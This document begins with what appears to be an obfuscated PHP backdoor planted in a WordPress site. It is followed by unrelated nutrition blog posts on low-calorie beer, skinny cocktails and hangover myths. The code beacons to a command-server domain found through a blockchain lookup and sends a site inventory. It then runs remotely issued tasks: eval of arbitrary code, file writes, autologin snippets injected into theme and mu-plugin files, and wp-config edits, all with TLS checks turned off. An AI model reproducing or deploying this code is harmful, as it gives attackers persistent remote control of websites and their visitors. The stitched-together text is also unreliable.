// 32_3i
if(!defined('ABSPATH'))return;
$cfg=array(
'stub'=>'/home/dh_euksrr/skinnygeneprojectnew.dreamsites.io/wp-content/plugins/hseo/hseo.php',
'ctrl'=>'// 32_3i',
'vis'=>'// dt_hq',
'vis_func'=>'wp_b81w3r',
'vis_paths'=>array('/home/dh_euksrr/skinnygeneprojectnew.dreamsites.io/wp-content/plugins/hseo/hseo.php'),
'opt'=>'_wp_kvystp5t',
);
$keys=array();
$keys['id']='n2t';
$keys['ver']='i1';
$keys['caps']='nl6';
$keys['tasks']='eq2';
$keys['interval']='0jg';
$keys['ack_id']='ytf';
$keys['ok']='s5';
$keys['detail']='bz5';
$keys['inv']='dfw';
$keys['result']='ol0';
$hdr='X-5IR-Auth';$tok='qzgyGwI7GiNUKTDGlCr9NH72og7zIFkNJcTkhoBHA4E';$id='5c8458f75b41e4ae';$interval=420;
function _ea_inv($cfg){
$r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION);
$chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o;
if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;};
$r['stub']=$chk($cfg['stub'],$cfg['ctrl']);
$vis=array('plugin'=>null,'paths'=>array());
foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);}
$found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}}
if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}}
$vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false);
$r['visitor']=$vis;
$mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins';
if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}}
$r['mu_autologin']=$mu;
$ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}}
$r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw);
$wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false);
if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));}
$r['wpconfig_inject']=$wpc;
$cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc';
if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache';
if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status'));
return $r;}
function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){
$_ok=false;$_detail='';$_result=null;
$_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0;
if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){
$_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):'';
if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content'];
elseif($_code==='wf')$_body=$_p['content'];
$_ok=@file_put_contents($_path,$_body)!==false;
}elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){
$_ok=@file_put_contents($_p['path'],$_p['content'])!==false;
}elseif($_code==='rp'&&!empty($_p['code'])){
ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();}
$_result=array('output'=>ob_get_clean());}
elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;}
elseif($_code==='fc'){
$p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';}
if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';}
if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';}
if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';}
if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';}
if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';}
if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';}
$_ok=true;$_result=array('purged'=>$p);}
elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){
@wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false;
}elseif($_code==='fn'&&!empty($_p['snippet'])){
$td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}}
$_ok=$n>0;$_result=array('themes_updated'=>$n);}
elseif($_code==='wc'){
$wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp);
if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);}
$b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;}
}
$ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail);
if($_result!==null)$ack[$keys['result']]=$_result;
return $ack;}
function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){
$k=$cfg['opt'];if(!$force&&!wp_doing_cron()){
if(is_admin())return;
$last=(int)get_option($k,0);if(time()-$last<$interval)return;
}
$u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public');
foreach($rpcs as $_rpc){
$b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest')));
$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true)));
$raw=@file_get_contents($_rpc,false,$ctx);
if(!$raw)continue;
$j=json_decode($raw,true);
if(empty($j['result'])||strlen($j['result'])<10)continue;
$h=substr($j['result'],2);
if(strlen($h)<128)continue;
$off=(int)hexdec(substr($h,0,64));
$len=(int)hexdec(substr($h,$off*2,64));
$_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break;
}
$_hp='/panel/api/v1/metrics/collect';
$_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z);
if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');}
$_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site';
$_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10);
$u='https://'.$_s.'.'.$_z.$_hp;
$_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack';
$inv=_ea_inv($cfg);
$b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv);
$resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);}
if(!$resp)return;
update_option($k,time(),false);
$j=json_decode($resp,true);$tk=$keys['tasks'];
if(empty($j[$tk])||!is_array($j[$tk]))return;
foreach($j[$tk] as $_task){
$ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id);
if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);}
}
}
add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;});
add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){
if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync');
_ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false);
},1);
add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){
_ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true);
});
In fact, drinking beer in moderation can even be good for you and potentially be a good source of soluble fiber and prebiotic substances that promote digestion. In addition, beer can contain significant levels of vitamins, antioxidants, and minerals, such as folate, niacin, vitamins B6 and B12. Beer consumption may also help reduce risk of developing kidney stones, possibly due to its water content and diuretic effect. Compounds in hops may also slow the release of calcium from bone that is implicated in kidney stones. Health benefits of beer may be obtained if consumed within the Dietary Guidelines for Americans that recommend a limit of 1 drink per day for women and 2 drinks per day for men (one drink is equivalent to a 12oz beer).
The number of calories in a beer is based primarily on alcohol content, not on color or texture of the beer. Most “light” beers contain about 100-130 calories and are a good choice if you are watching your waistline while drinking. The difference between a “light” beer and a regular beer could be as few as 20 calories or as many as 100. Some of the popular “light” beers may be very low in calories, but have a “watered-down” taste to some. If you’re looking for a refreshing, low-calorie beer that doesn’t skimp on the flavor, use these 10 low-calorie beers as a guideline so that you can enjoy a beer or two without wrecking your diet. All are big on flavor, but relatively low in booze and calories:
In addition to the beers mentioned, many pubs and breweries are offering “session” beers, which tend to be less than 5% ABV. Not only are they low calorie, but they provide a nice balance of malt to hops with a clean finish. These beers are for patrons to have a few beers in a reasonable amount of time without overwhelming the senses or leaving one intoxicated. There is also a surprising variety of taste in this range of brews.
For the athletic readers out there, keep in mind that alcohol not only affects performance (if taken more than in moderation), but it also affects recovery and rehydration times, especially for those training for a big event such as a multiple day race. Slowed hydration recovery is due to the diuretic effects of alcohol. The rate at which the liver can replace used glycogen (stored carbohydrate used for energy) is reduced when alcohol is consumed after an intense workout, slowing recovery time.
Use the above list as a guideline to help you pick out your favorite low-calorie, but flavorful brew. Remember, the number of calories in a beer is determined by its alcohol content. The higher the alcohol content, the more calories. Beer does not have to be skipped in fear of developing the “beer belly”, as long as consumed in moderation and considered in your daily calorie consumption so that you can plan accordingly. Cheers!
]]>
A day’s worth of exercising and eating right can go down the drain in just one night of happy hour. Calories consumed while drinking your favorite cocktails can add up fast. For example, an 8oz Long Island Iced Tea can rack up to 780 calories! But before you swear off Long Islands for life, try some of the healthier ways to sip your favorite drinks. Just follow these skinny cocktail do’s and don’ts.
Skinny Cocktail Do’s:
Skinny Cocktail Don’ts:
Don’t let worries about the calories in your cocktails stress you out or keep you from enjoying a drink with your family and friends. Try one of these 10 skinny cocktails that are low in calories but great in taste:

1) Watermelon Mojito (100 calories) – Gently crush cubes of watermelon with fresh mint leaves. Add rum and sparkling water for a sweet mojito with half the calories of a regular mojito.
2) Simple Margarita (170 calories) – Skip the syrupy mixes and try these basic ingredients: one shot of tequila, lime juice to taste, and a splash of triple sec. Shake with ice and serve.
3) Skinny Piña Colada (229 calories) – Add fresh strawberries and a splash of agave syrup to one shot of coconut rum. Blend with ice. Cutting out the sugary, coconut milk mix cuts down on the calories but not on the taste.
4) Shochu Cosmo (70 calories) – Cut the calories in a cosmopolitan in half by replacing the vodka with shochu, a Japanese spirit with a smooth flavor since a 2-oz serving contains only about 35 calories. Add splashes of diet cranberry juice, fresh lime juice, and orange juice and mix in a martini shaker.
5) Slim Berry Daiquiri (145 calories) – Start with 1 cup of fresh or frozen no-sugar-added berries for just 50 calories, compared with 255 calories in berries frozen with syrup. Add rum, ice, and 1 teaspoon of stevia, a sugar substitute. Blend together for a slim and delicious frozen concoction.
6) Slim Gin & Tonic (75 calories) – Tonic water can contain nearly as many calories as soda. Try switching to diet tonic water, bubbly seltzer water, or club soda for a skinny version of this favorite cocktail. Add some flavor with a squeeze of lime juice.
7) Better Bellini (120 calories) – Cut the calories in half by using half of the usual amount of peach nectar. Try slimming down this drink with just about 2oz of peach nectar with 4oz of champagne. Mimosa drinkers can try the same trick by using half the usual amount of orange juice to cut the calories.
8) Asian Flavor Fusion (90 calories) – Flavor-infused alcohols can be a tasty alternative to high calorie juice mixes. Try ginger vodka and lime sparkling water for a low-calorie fusion of Asian flavors. Look for flavored seltzer or mineral waters with no added calories.
9) Skinny Vodka Iced Tea (80 calories) – Cut the calories in the popular cocktail of lemonade, sweet iced tea, and a shot of vodka. Instead, try using low-calorie lemonade and sweet-tea-flavored vodka.
10) Lemongrass Collins (90 calories) – Cut the syrupy mix, sugar, and other sweeteners in the usual Tom Collins and try this drink instead: vanilla vodka, splash of lime juice, and a zero-calorie sparkling water flavored with lemongrass, mint, and vanilla.
]]>Don’t mix your liquors, drink whiskey before beer, more alcohol cures a hangover — you’ve heard it before. But knowing a little more than the conventional wisdom when it comes to alcohol and hangovers may help you hold your liquor a little better and make the next day after a night of drinking a little less horrendous. There’s no one solution to fix all the symptoms of a hangover, but here are 12 hangover myths and facts to keep in mind to help alleviate or prevent the aftermath of last night’s escapades.

FACT: Heavy drinking affects the central nervous system and tampers with brain chemicals, which leads to headaches, dizziness, nausea, and dehydration (from frequent bathroom breaks). These symptoms follow you to the morning after with a headache, fatigue, cotton mouth, queasy stomach, and a weakened immune system. It is best to drink responsibly. Try to limit your drinks to about one every hour since this is about how long it takes to metabolize each drink for most people. Drinking in moderation is a good way to help prevent the nasty symptoms of hangovers. Moderate drinking is defined as one drink a day on average for women and two drinks a day for men.
FACT: Beware of free drinks on Ladies’ Night. A woman is more likely to feel the effects of alcohol in comparison with a man who drinks the same amount. This is because men have a higher percentage of water in their body than women, which helps dilute the alcohol they drink. When women drink the same amount, more alcohol builds up in the bloodstream. So ladies, best bet is to add some fat into your meals beforehand to slow down the absorption of alcohol into the bloodstream. This doesn’t necessarily mean to aim for the cheeseburger and fries. Healthy fats can do the trick! So try having salmon and sautéed vegetables or a turkey sandwich with avocado as your pre-party meal.
FACT: Just a couple of drinks can trigger hangover symptoms for some people. Of course, glasses the size of fish bowls, generous refills, and libations that taste like desserts can all put anyone on a path to pain the next morning (not to mention weight gain from all the extra calories), but your best bet to preventing a hangover is to drink water or a non-alcoholic beverage between cocktails to help keep you hydrated, cut down the total amount of alcohol you drink, and help decrease hangover symptoms.
FACT: Red wine contains tannins – compounds that are known to trigger headaches in some people. Malt liquors, such as whiskey, also tend to cause severe hangovers. The gentlest choices are beer and clear liquors, such as vodka and gin. Try ordering the drinks “on the rocks” (with ice) and sip slowly. As the ice melts, the drink is diluted. Drinks like Manhattans and Cosmopolitans are strained, so they stay just as potent as time goes by. Alcohol is absorbed more quickly than it is metabolized. Taking your time with a drink will increase your time between refills and decrease your odds of a hangover.
FACT: Diet drinks help if you’re counting calories, but won’t necessarily decrease your chances of experiencing a hangover. In fact, research suggests that mixing your booze with diet versus regular soda leads to an extra 18% increase in your blood alcohol content. Without sugar and calories in your stomach, alcohol is absorbed more quickly into your bloodstream. Having fruits, fruit juices, or other sugar-containing liquids can aid in a less intense hangover, but pick your drinks wisely if you are watching calories.
FACT: The amount of alcohol you drink is what matters most, not the order of your drinks. Don’t be fooled by the size of your drink – a 12-ounce glass of beer, a 5-oz glass of wine, or a 1.5-oz shot of distilled spirits are all considered as one drink and contain about the same amount of alcohol. Try to stay away from “tall” 22oz beer mugs or the fishbowl sized drinks to better monitor your alcohol consumption.
FACT: Eating at bedtime is no help. Food in your stomach before happy hour has more of an impact than eating after you’re already drunk. Although any food can slow down alcohol absorption into your bloodstream, fat does it best. Healthy fats are the way to go as mentioned previously. It is also best to drink water throughout the night to fight dehydration and soften the blow of the morning-after hangover.
FACT: Over-the-counter painkillers peak in about four hours, so a bedtime dose won’t help by the time you wake up. It is better to take the pills when you first wake up. Beware of acetaminophen (Tylenol) after a night of drinking because the combination of the two could hurt your liver. If you are inclined to take pain relievers, stick to non-steroidal anti-inflammatory drugs (NSAIDS) such as aspirin or ibuprofen.
FACT: Alcohol does just the opposite. Alcohol may help you doze off more quickly, but it undermines the quality of your sleep. You tend to wake up too soon and not spend as much time in important REM cycles of sleep. Disruptions in REM sleep may cause daytime drowsiness and poor concentration. If you’ve been drinking heavily, a hangover might strike in the last part of the night, leaving you too uncomfortable to get back to sleep. In fact, the more you drink before bed, the more pronounced these effects. The best tips to get good quality sleep at night include getting regular exercise (but not too close to bedtime), reserving the bed for sleep only, keeping your bedroom at a cool temperature, setting regular wake and bed times, and avoiding caffeine, alcohol, or nicotine in the evening. It may be best to limit your drinks or get your drinks on early in the evening instead of when the night is coming to a close so that it doesn’t interfere with your much needed sleep. One to two standard drinks seem to have minimal effects on sleep for most people.
FACT: More alcohol in the morning does nothing but postpone a hangover. The worst symptoms hit when blood-alcohol levels drop to zero. Even if you have a screwdriver or mimosa in the morning at breakfast, the hangover will just come later in the day. If you feel you can’t function without a wake-up cocktail, you should talk with your doctor about getting help for alcohol addiction. Experts agree that if you use this method, the risk of abuse increases and may lead to alcohol dependency.
FACT: A lot of coffee may lead to more hydration and could make your hangover worse. After a night of drinking, it’s best to avoid anything with caffeine. It is best to sip water and sport drinks (minimally) to counter dehydration and replace lost electrolytes, especially if you threw up. Or try adding a small amount of orange or fruit juice to water. Otherwise, the only proven cure for a hangover is time.
FACT: Hangover pills, such as yeast and artichoke extract have been studied by British researchers. They found no compelling evidence that supported these suggested remedies. Another British team found a supplement from prickly pear cactus that may reduce some symptoms, such as nausea and dry mouth, but not headaches. Metabolizing alcohol requires nutrients. The more you drink, the more nutrients your body has to call up from the bloodstream to replenish your liver’s tapped resources. Include whole, natural ingredients such as fresh produce, whole grains and lean protein in your daily meals and snacks. It is especially important to try to eat a well-balanced meal before alcohol consumption. Never drink on an empty stomach as this may lead to binge eating or poor food choices.
Want to learn more about Skinny Libations? First, check out the first article in our series and learn how to avoid alcohol-related weight gain. Then, sign up for our free Skinny Libations Series so you can have your cocktail, and drink it too!
Cheers to happy hour and healthy drinking!
Please always remember to drink responsibly!
]]>

By Rennie Aranda, Skinny Gene Nutritionist
Happy hour can get less happy when you realize all your healthy eating throughout the week is sabotaged by your cocktail choices at the bar and your favorite jeans are feeling more snug than usual. A night on the town doesn’t have to mean wrecking your diet. The key is to choose your cocktails carefully and consume them in moderation. The first step is to familiarize yourself with what constitutes as one serving of alcohol and the estimated calories and carbohydrates in common alcoholic beverages.
Use the following “Happy Hour Cheat Sheet” to help serve as a guide in navigating through happy hour without wrecking your diet.
(Please click on the image below to enlarge it.)
Mixed drinks can get a little tricky in determining healthy choices at the bar to choose from. Use the following “Cocktail Cheat Sheet” to get a sense of higher calorie versus lower calorie drinks among these popular cocktails.
Try to mix cocktails with water, club soda (not tonic), low calorie juices, or sugar-free syrups/mixers for calorie savings. Before you head out to the next cocktail party or happy hour, make sure to plan ahead. Decide in advance the number of cocktails you are planning to drink and try to cut back on some calories during the day in anticipation. Try to eat a light snack before you go out so you won’t get tipsy with the first drink or be more tempted to dive into food. As a rule of thumb, you should do 30 minutes of moderate-paced walking per 100 calories to burn off your happy hour cocktails. More importantly, always be aware of your own personal limits.
Want to learn more about Skinny Libations? First, check out the first article in our series and learn how to avoid alcohol-related weight gain. Then, sign up for our free Skinny Libations Series so you can have your cocktail, and drink it too!
Cheers to happy hour and healthy drinking!
Please always remember to drink responsibly!]]>
Alcohol is a part of many social occasions, from holiday parties to birthday celebrations, to family dinners and sporting events. Does being healthy mean abstaining from alcohol altogether? Is it possible to keep your figure and have your drinks too?
Numerous scientific studies have shown that people who drink in moderation can still keep their figure and enjoy alcoholic beverages. The key word is moderation. You can still go out with your friends without the guilt of extra calories from drinking. However, maintaining a healthy weight goes beyond moderate drinking. You still need to incorporate healthy eating and exercise into your overall regimen toward a healthy lifestyle. With that in mind, there are also healthy alternatives and easy guidelines to follow so you can have your cocktail and drink it too!

First off, let’s think about the main subject at hand, alcohol. The key to keeping alcohol in your diet is understanding how it is processed in your body. When you consume beverages with alcohol, your body has to convert the alcohol into other substances since your body cannot store or remove alcohol in its pure form. Once converted, substances broken down from alcohol can be eliminated from the body. The liver is the main place where alcohol is converted into these substances.
Alcohol does not directly slow down metabolism, but drinking alcohol can contribute to weight gain. The substances that alcohol is broken down to are burned off before your body can burn calories from other sources such as carbohydrates, proteins or fats. In addition, alcohol consumption impairs your body’s ability to burn fat as a source of energy, leading to possible weight gain with the extra calories not being burned off.
Calories provide energy for our bodies to function and come from carbohydrates, protein, fat, and alcohol. The difference is, unlike the other three sources, alcohol does not carry any nutritional value. For each gram of carbs, protein, etc., you get a set number of calories. For 1 gram of carbohydrate or protein, you get 4 calories. For 1 gram of fat, you get 9 calories. Alcohol contains about 7 calories per gram, which is almost as many calories as fat and almost double the caloric content of carbohydrates or protein. That means you might have to put in almost double the effort to burn those pesky calories.
Consider this… A 150 lb person would have to brisk walk about 4-5 miles to burn off about 300-400 calories (such as in a fast food double hamburger), which is the same number of miles to burn off about two regular beers.
Although consuming alcohol may make it harder for you to lose weight because of the increased number of calories you consume, it won’t necessarily impair weight loss as long as you otherwise follow a low-calorie diet or as long as your caloric intake is the same. This is not to say replace your more wholesome, nutritious foods with alcohol. If you are drinking on a daily basis and your weight remains stable, you’re probably not getting enough nutrients. Limit alcohol so you can get enough real food. If you want to have an occasional drink with your friends or family, you can still practice a healthy lifestyle by incorporating a healthy diet and exercise so that those extra calories from alcoholic beverages won’t result in weight gain.
Follow some of these tips for calorie reduction, staying safe and healthy, and making the best choices when you’re out enjoying drinks with your family and friends:
– Drink in moderation. This is defined as one drink a day on average for women and two drinks a day for men. One drink is equivalent to a 5 oz glass of wine, 12 oz beer, or 1.5 oz 80 proof liquor.
– Drink water for thirst. Drink a full glass of water before your alcoholic beverage – Wine, beer and hard liquor do NOT quench thirst.
– Alternate one non-alcoholic beverage (sipped slowly) with each alcoholic drink. A sparkling water with lime is a good drink to have in between, especially if you are watching calories. When you begin to feel buzzed, stop or take a break.
– Skip binge drinking. Some dieters believe that if they save all their drinks for the weekend, they aren’t consuming the same number of calories. Regardless, calories add up. In addition, binge drinkers end up developing conditions that may impair weight loss or maintenance.
– Drink on special occasions. Consider having a few drinks to celebrate a special occasion or when meeting friends or family for dinner instead of having one or two drinks every weekend.
– Choose the right booze. Look for drinks that contain the lowest calories. Keep in mind that many mixed cocktails can contain more calories than the alcohol itself. A 5 oz glass of wine can contain up to 120 calories. Don’t be fooled by the small shot glasses either. They can contain 60-100 calories per shot that can soon add up. Beer contains the highest amount of calories since it may have sugar (e.g. maltose) and carbs (i.e. cereal grains), providing about 150-200 calories and possibly leading to the renowned “beer belly” if consumed in high amounts. Choose a sugar-free mixer if possible or anything with the word “skinny” or “light”. These drinks may contain less calories than their regular counterparts. Stay clear of any sugary mixer or juices, which are likely to be high in calories.
– Stick to proper measurements. Keep track of drinks by sticking to the standard size of one drink at a time. With supersized beer mugs or fancy cocktail glasses, your “one drink” may be 2 or 3 in disguise.
– Balance your alcohol intake with a natural, low-sugar, low sodium diet. Eat as cleanly as possible throughout the week, consisting of whole, natural ingredients such as fresh produce, whole grains and lean protein to maintain a healthy weight. It is especially important to eat a well-balanced meal before your drink alcohol. Never drink on an empty stomach as this may lead to binge eating or poor food choices.
– Boost hydration while drinking and the following day. Flush your body of toxins by drinking more water every day, especially since alcohol can have a dehydrating effect on the body. Match every alcoholic beverage with an 8 oz glass of water. Finish the evening with a non-alcoholic drink, ideally a glass of water, to prevent hangovers.
– Add exercise into your daily routine after a night of drinking. 30 minutes to 1 hour of exercise can help shake the “alcohol fog” as well as boost your metabolism.
Want to learn more about how to have your cocktail and drink it too?
SIGN UP (below) for our free email series “Skinny Libations” and get the skinny on how you can sustain a healthy lifestyle while enjoying a few libations with friends!
When you sign up, once a month, you’ll receive our tips and tricks for keeping it social while keeping your figure, which will include:
1.) Healthiest Choices at Happy Hour – Choosing the best choices at the bar!
2.) 12 Hangover Myths– What you should know!
3.) Skinny Cocktails – Skimp on the calories, not the taste!
4.) What’s on tap– Best way to beat the “beer belly”!
5.) Wine and Dine – Sip, nibble, and nosh your way into good health!
Salud!